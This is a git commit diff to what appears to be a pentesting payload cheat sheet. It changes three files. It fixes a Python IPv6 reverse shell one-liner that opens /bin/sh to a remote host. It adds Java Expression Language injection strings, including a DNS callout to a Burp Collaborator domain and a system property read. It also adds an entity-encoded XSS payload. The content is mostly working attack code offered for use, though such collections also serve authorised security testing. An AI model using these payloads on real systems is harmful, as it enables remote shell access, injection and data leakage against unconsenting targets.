Expression Language Injection One-Liners; XSS Payload; Fixed Linux Python IPv6 Reverse Shell Payload

Bort-Millipede · Bort-Millipede · commit 9bde75b32d58 · 2021-08-23T14:41:40.000-05:00
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty")
 
 IPv6 (No Spaces, Shortened)
 ```python
-python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")'
+python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
 ```
 
 Windows only
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
@@ -149,6 +149,16 @@ ${1+1}
 #{1+1}
 ```
 
+### Expression Language EL - One-Liner injections not including code execution
+
+```java
+// DNS Lookup
+${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net")}
+
+// JVM System Property Lookup (ex: java.class.path)
+${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
+```
+
 ### Expression Language EL - Code Execution
 
 
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
@@ -230,6 +230,12 @@ e.g: 14.rs/#alert(document.domain)
 Use CTRL+SHIFT+X to trigger the onclick event
 ```
 
+### XSS when payload is reflected capitalized
+
+```javascript
+<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
+```
+
 ### DOM based XSS
 
 Based on a DOM XSS sink.
